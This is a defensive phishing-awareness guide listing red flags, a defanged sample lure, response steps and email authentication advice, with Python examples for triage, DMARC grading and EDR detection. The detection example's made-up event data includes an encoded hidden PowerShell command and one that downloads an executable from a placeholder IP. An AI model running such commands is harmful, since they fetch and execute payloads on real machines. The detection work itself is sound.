The Email That Cost One Company $37 Million
In 2024, the FBI's Internet Crime Complaint Center reported that business email compromise — a sophisticated cousin of phishing — accounted for over $2.9 billion in adjusted losses in 2023 alone. That's not a typo. And those are just the cases that got reported. I've personally investigated incidents where a single convincing phishing email led to full network compromise within 48 hours. If you want to know how to spot phishing emails before they gut your organization, this guide breaks down the exact red flags, techniques, and habits that actually work.
Phishing remains the number one initial attack vector, according to the 2024 Verizon Data Breach Investigations Report. Threat actors don't need to hack your firewall when they can trick your receptionist into clicking a link. Here's what I've learned from years of dissecting these attacks.
What Is a Phishing Email, Really?
A phishing email is a message crafted by a threat actor to trick you into taking an action — clicking a link, opening an attachment, entering credentials, or wiring money. That's it. The sophistication ranges from laughably bad to terrifyingly convincing.
What makes phishing so dangerous isn't the technology. It's the social engineering. Attackers exploit urgency, authority, fear, and curiosity. They study your organization, mimic your vendors, and time their messages to land when you're distracted.
Understanding this psychology is the first step to building real defense. Technology catches some phishing. Trained humans catch the rest.
How to Spot Phishing Emails: 9 Red Flags That Matter
I've reviewed thousands of phishing emails in forensic investigations. These are the red flags that show up again and again. Memorize them. Drill them into your team.
1. The Sender Address Doesn't Match the Brand
This is the single easiest check, and most people skip it. A message claiming to be from Microsoft arrives from [email protected]. The display name says "IT Support" but the actual email address is a random domain. Always expand the sender field and read the full address.
In my experience, roughly 70% of phishing emails I analyze use lookalike domains — swapped characters, added hyphens, or completely unrelated domains hidden behind a familiar display name.
2. Urgency That Demands Immediate Action
"Your account will be suspended in 24 hours." "Unauthorized login detected — verify now." "Payment overdue — immediate action required." Threat actors weaponize urgency because panicked people don't think critically. Legitimate organizations rarely threaten instant consequences via email.
3. Generic Greetings on Supposedly Personal Messages
Your bank knows your name. Your employer knows your name. If an email about "your account" starts with "Dear Customer" or "Dear User," that's a flag. Spear phishing attacks targeting specific individuals will use your real name, so this alone isn't conclusive — but combined with other signals, it matters.
4. Links That Don't Go Where They Claim
Hover over every link before clicking. On desktop, your browser or email client will show the actual URL in the bottom-left corner or a tooltip. If the text says "Login to your account" but the URL points to hxxps://login.account-verify-secure.xyz, that's a phishing page designed for credential theft.
On mobile devices, long-press the link to preview the URL. Never tap links in unexpected emails on your phone — the small screen makes it harder to spot fakes.
5. Unexpected Attachments
Attachments remain a primary delivery mechanism for malware and ransomware. If you weren't expecting a file — especially a .zip, .exe, .docm, or .html attachment — don't open it. Even PDFs can contain malicious links. I've seen attackers disguise executable files as invoices, shipping confirmations, and HR documents.
6. Requests for Credentials or Sensitive Data
No legitimate company emails you asking for your password, Social Security number, or full credit card number. None. Ever. If an email asks you to "verify your credentials" by entering them on a linked page, it's phishing. This is the core mechanic of credential theft, and it works because people trust the context the attacker creates.
7. Spelling and Grammar Errors — But Not Always
The old advice about typos still holds for bulk phishing campaigns. Misspelled words, awkward phrasing, and broken grammar indicate a low-effort mass attack. But here's the catch: AI-generated phishing emails in 2024 are nearly flawless. Attackers use large language models to write perfect English. Don't rely on grammar alone.
8. Mismatched Branding and Formatting
Blurry logos, wrong colors, inconsistent fonts, and formatting that doesn't match the company's usual emails are strong signals. Compare suspicious emails side-by-side with legitimate ones you've received from the same organization. Your eye will catch differences your conscious mind might miss.
9. Too-Good-to-Be-True Offers
"You've won a $500 gift card." "Claim your tax refund." "Your package is waiting — just confirm your address." If you didn't enter a contest, file for a refund, or order a package, these are social engineering bait. They exploit curiosity and greed in equal measure.
What Does a Real Phishing Email Look Like?
Let me walk you through a composite based on real attacks I've analyzed — details changed to protect the organizations involved.
Subject: Action Required: Unusual Sign-In Activity
From: [email protected]
Body: "We detected an unusual sign-in attempt on your account. If this wasn't you, please verify your identity immediately by clicking the button below. Failure to respond within 12 hours will result in account suspension."
Button text: Verify My Identity
Actual link: hxxps://login-verify.accountsecure.ru/auth
Red flags present: lookalike domain (micros0ft, not microsoft), urgency (12 hours), fear (account suspension), link goes to a Russian domain. This email would bypass many spam filters because it uses proper formatting, correct Microsoft branding, and grammatically perfect English.
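To show how the first, second and fourth checks above can be automated for inbox triage, here is an added example (my own code, not part of the composite) that parses a constructed message modelled on it and reports the sender, urgency and link red flags; the brand allow-list and the homoglyph table are assumptions.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample modelled on the composite above (not a real message).
SAMPLE = """\
From: Microsoft Account Team <security@micros0ft-account.com>
Subject: Action Required: Unusual Sign-In Activity
Content-Type: text/html

<p>We detected an unusual sign-in attempt on your account. If this wasn't you,
please verify your identity immediately. Failure to respond within 12 hours
will result in account suspension.</p>
<a href="https://login-verify.accountsecure.ru/auth">Verify My Identity</a>
"""

BRANDS = {"microsoft": ["microsoft.com"]}   # assumed allow-list of real domains
HOMOGLYPHS = str.maketrans("01$", "ols")    # 0->o, 1->l, $->s before comparing
URGENCY = re.compile(r"immediately|within \d+ hours?|suspend|suspension|verify", re.I)

def normalize(host: str) -> str:
    """Undo the common character swaps used in lookalike domains."""
    return host.lower().translate(HOMOGLYPHS).replace("rn", "m")

def on_brand(host: str, legit: list[str]) -> bool:
    return any(host == d or host.endswith("." + d) for d in legit)

def triage(raw: str) -> list[str]:
    """Return the red flags found in one raw RFC 5322 message."""
    msg = message_from_string(raw)
    name, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rpartition("@")[2].lower()
    flags = []
    for brand, legit in BRANDS.items():
        # Display name or lookalike domain claims the brand, but the domain is not theirs
        imitates = brand in normalize(sender_domain) or brand in name.lower()
        if imitates and not on_brand(sender_domain, legit):
            flags.append(f"sender {addr} claims {brand} but is not a {brand} domain")
    body = msg.get_payload()
    hits = sorted({m.lower() for m in URGENCY.findall(body)})
    if hits:
        flags.append("urgency/threat language: " + ", ".join(hits))
    # The "hover over the link" check: anchor text versus the host the href really points at
    for href, text in re.findall(r'<a href="([^"]+)">([^<]+)</a>', body):
        host = (urlparse(href).hostname or "").lower()
        if not any(on_brand(host, legit) for legit in BRANDS.values()):
            flags.append(f"link '{text}' actually goes to {host}")
    return flags
```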
The $4.88M Lesson Your Organization Can't Afford
IBM's 2024 Cost of a Data Breach Report puts the global average cost of a data breach at $4.88 million. Phishing was the most common initial attack vector, and breaches starting with phishing took an average of 261 days to identify and contain.
Think about that. A single employee clicking a single link can trigger a breach that takes nearly nine months to fully resolve. The costs cascade: incident response, legal fees, regulatory fines, customer notification, brand damage, and lost business.
This is why knowing how to spot phishing emails isn't just an IT problem — it's a business survival skill. Every employee with an email address is a potential entry point for threat actors.
Why Phishing Simulations Change Behavior
Telling people about phishing doesn't work. Testing them does. In my experience running security awareness programs, organizations that conduct regular phishing simulations see click rates drop from 25-35% to under 5% within six months.
A good simulation program sends realistic phishing emails to employees, tracks who clicks, and delivers immediate training at the moment of failure. That instant feedback loop rewires behavior in a way that annual PowerPoint presentations never will.
If your organization isn't running phishing simulations yet, our phishing awareness training for organizations is designed to build exactly this capability — realistic scenarios, measurable results, and training that sticks.
What to Do When You Spot a Phishing Email
Knowing how to spot phishing emails is only half the equation. Here's what to do next:
- Don't click anything. No links, no attachments, no "unsubscribe" buttons.
- Report it. Use your organization's phishing report button (most email clients have one) or forward it to your IT/security team.
- Delete it. After reporting, remove it from your inbox and trash.
- If you clicked, say so immediately. Speed matters. Your security team can reset credentials, isolate machines, and block malicious domains — but only if they know.
- Change your password. If you entered credentials on a suspicious page, change that password everywhere you used it. Enable multi-factor authentication if you haven't already.
The worst thing an employee can do after clicking a phishing link is hide it. I've seen breaches escalate from minor incidents to full-blown ransomware attacks because the initial compromise went unreported for days.
Multi-Factor Authentication: Your Safety Net
Even the best-trained employee will eventually make a mistake. That's why multi-factor authentication (MFA) is non-negotiable. MFA ensures that stolen credentials alone aren't enough for a threat actor to access your systems.
According to CISA's MFA guidance, enabling MFA blocks over 99% of automated credential attacks. It's the single most effective technical control against phishing-driven credential theft.
Use app-based authenticators or hardware security keys. SMS-based MFA is better than nothing but vulnerable to SIM-swapping attacks. Push notifications with number matching add another layer of verification.
Building a Zero Trust Mindset Around Email
The zero trust security model applies perfectly to email. The principle is simple: never trust, always verify. Every email is suspicious until proven otherwise — regardless of who it appears to come from.
Here's what a zero trust approach to email looks like in practice:
- Verify out-of-band. If your CEO emails asking for a wire transfer, call them on a known phone number. Don't reply to the email.
- Assume compromise. Treat every unexpected attachment and link as potentially malicious, even from known contacts. Their account may be compromised.
- Limit trust in display names. Display names are trivially spoofed. Always check the actual sender address.
- Layer defenses. Email filtering, endpoint detection, MFA, and trained employees all work together. No single layer is sufficient.
Zero trust isn't a product you buy. It's a mindset your entire organization adopts. And it starts with security awareness training that teaches people to question everything they receive.
Training That Goes Beyond a Poster on the Wall
I've seen too many organizations check the "security training" box with a once-a-year video and a quiz. That's compliance theater. It doesn't reduce risk.
Effective security awareness training is continuous, scenario-based, and tied to your organization's actual threat landscape. It includes phishing simulations, teaches employees to recognize social engineering tactics, and builds a culture where reporting suspicious emails is rewarded — not punished.
Our cybersecurity awareness training program covers phishing, social engineering, ransomware prevention, credential hygiene, and more. It's built for organizations that want measurable improvement, not just a checkbox.
The Technical Controls That Support Trained Eyes
Human training works best when backed by solid technical controls. Here's what your IT team should have in place:
Email Authentication Protocols
SPF, DKIM, and DMARC are email authentication standards that help prevent domain spoofing. If your organization hasn't implemented DMARC with a policy of "reject," attackers can send emails that appear to come from your exact domain. The NIST Trustworthy Email guidelines (SP 800-177) provide detailed implementation steps.
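An added example, not from the NIST guidance or this article: a small grader for the SPF and DMARC TXT records a DNS lookup returns, flagging the settings that fall short of the "reject" bar; the records below are constructed, and the DNS query itself is left out so it runs offline.

```python
def parse_dmarc(record: str) -> dict[str, str]:
    """Turn 'v=DMARC1; p=reject; rua=mailto:...' into a tag -> value dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags

def assess_dmarc(record: str) -> list[str]:
    """List the weaknesses that let attackers send mail as your exact domain."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["not a DMARC record"]
    findings = []
    policy = tags.get("p", "none").lower()
    if policy == "none":
        findings.append("p=none: spoofed mail is delivered and only reported")
    elif policy == "quarantine":
        findings.append("p=quarantine: spoofed mail lands in spam instead of being rejected")
    pct = int(tags.get("pct", "100"))
    if pct < 100:
        findings.append(f"pct={pct}: policy is applied to only {pct}% of failing mail")
    sub_policy = tags.get("sp", policy).lower()   # RFC 7489: sp defaults to p
    if sub_policy != "reject":
        findings.append(f"sp={sub_policy}: subdomains of your domain can still be spoofed")
    if "rua" not in tags:
        findings.append("no rua= address: you receive no aggregate reports")
    return findings

def assess_spf(record: str) -> list[str]:
    """Flag SPF records whose 'all' qualifier lets unauthorized hosts through."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record"]
    alls = [t.lower() for t in terms[1:] if t.lower().lstrip("+-~?") == "all"]
    last = alls[-1] if alls else ""
    if last in ("all", "+all"):
        return ["+all: any host on the internet may send as your domain"]
    if last == "~all":
        return ["~all: unauthorized senders are only soft-failed, not rejected"]
    if last != "-all":
        return ["no -all: unlisted senders are treated as neutral"]
    return []

# Constructed records for illustration, not looked up from a real domain.
WEAK = ("v=spf1 ip4:203.0.113.0/24 ~all",
        "v=DMARC1; p=none; pct=50; rua=mailto:dmarc@example.com")
STRONG = ("v=spf1 ip4:203.0.113.0/24 -all",
          "v=DMARC1; p=reject; rua=mailto:dmarc@example.com")
```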
Advanced Threat Protection
Modern email security gateways use sandboxing to detonate attachments, URL rewriting to check links at click time, and machine learning to detect anomalous sending patterns. These tools catch many phishing emails before they hit inboxes. But they don't catch all of them — which is why trained humans remain the last line of defense.
Endpoint Detection and Response (EDR)
If someone does click a malicious link, EDR solutions on their device can detect suspicious behavior — like a browser spawning PowerShell, or a document trying to download an executable. EDR buys your team time to contain an incident before it spreads.
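Added example (my own, not from any EDR product): the two behaviours just described expressed as detection rules run over constructed process-creation events; the process lists and argument patterns are my assumptions, and the sample data is made up.

```python
import csv
import io
import re

# Constructed process-creation events in the style of EDR/Sysmon telemetry (not real data).
EVENTS = """\
host,parent_image,image,command_line
ws01,C:\\Program Files\\Google\\Chrome\\chrome.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell -nop -w hidden -enc QUFBQQ==
ws01,C:\\Windows\\explorer.exe,C:\\Program Files\\Google\\Chrome\\chrome.exe,chrome.exe --profile-directory=Default
ws02,C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell -Command Invoke-WebRequest http://198.51.100.7/invoice.exe -OutFile C:\\Users\\Public\\invoice.exe
ws02,C:\\Windows\\explorer.exe,C:\\Windows\\System32\\notepad.exe,notepad.exe
"""

# Assumed lists: user-facing apps that should not be launching shells, and the shells themselves.
USER_APPS = {"chrome.exe", "msedge.exe", "firefox.exe", "winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
EXE_URL = re.compile(r"https?://\S+\.(?:exe|dll|msi|scr)\b", re.I)
HIDDEN_ARGS = re.compile(r"(?:^|\s)-(?:enc(?:odedcommand)?|w(?:indowstyle)?\s+hidden|nop)\b", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events_csv: str) -> list[dict]:
    """Apply the browser-spawns-shell and document-downloads-executable rules to each event."""
    alerts = []
    for row in csv.DictReader(io.StringIO(events_csv)):
        parent, child = basename(row["parent_image"]), basename(row["image"])
        cmd = row["command_line"]
        reasons = []
        if parent in USER_APPS and child in SHELLS:
            reasons.append(f"{parent} spawned {child}")
        if parent in USER_APPS and EXE_URL.search(cmd):
            reasons.append("child downloads an executable from the web")
        if child in SHELLS and HIDDEN_ARGS.search(cmd):
            reasons.append("hidden/encoded shell arguments")
        if reasons:
            alerts.append({"host": row["host"], "parent": parent,
                           "process": child, "reasons": reasons})
    return alerts
```

Real telemetry carries user, session and hash fields too; the point here is that the parent/child relationship, not the child alone, is what makes these events suspicious.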
What Makes 2024 Phishing Different
Phishing in 2024 is more dangerous than ever. Three trends are driving the escalation:
AI-generated content. Attackers use generative AI to create phishing emails with perfect grammar, personalized details, and convincing pretexts. The days of obvious broken English are fading fast.
QR code phishing (quishing). Threat actors embed malicious URLs in QR codes attached to emails, bypassing traditional URL scanning. The victim scans the code with their phone — which likely lacks corporate security controls — and lands on a credential harvesting page.
Multi-channel attacks. Phishing no longer lives only in email. Attackers combine email lures with follow-up phone calls (vishing), text messages (smishing), and even Microsoft Teams or Slack messages. If your training only covers email, you're leaving gaps.
A Quick-Reference Checklist
Print this. Tape it next to your monitor. Share it with your team.
- Check the full sender email address — not just the display name
- Hover over links before clicking — verify the actual URL
- Question urgency — legitimate organizations don't threaten you via email
- Don't open unexpected attachments — especially .zip, .exe, .html, .docm files
- Never enter credentials from an email link — go directly to the website instead
- Report suspicious emails immediately — speed saves your organization
- Enable multi-factor authentication on every account that supports it
- Verify unusual requests through a separate channel — call, don't reply
Knowing how to spot phishing emails is a skill, and like any skill, it improves with practice. Run simulations. Talk about phishing openly. Reward people who report suspicious messages. Build a culture where vigilance is valued.
Your inbox is the front line. Act like it.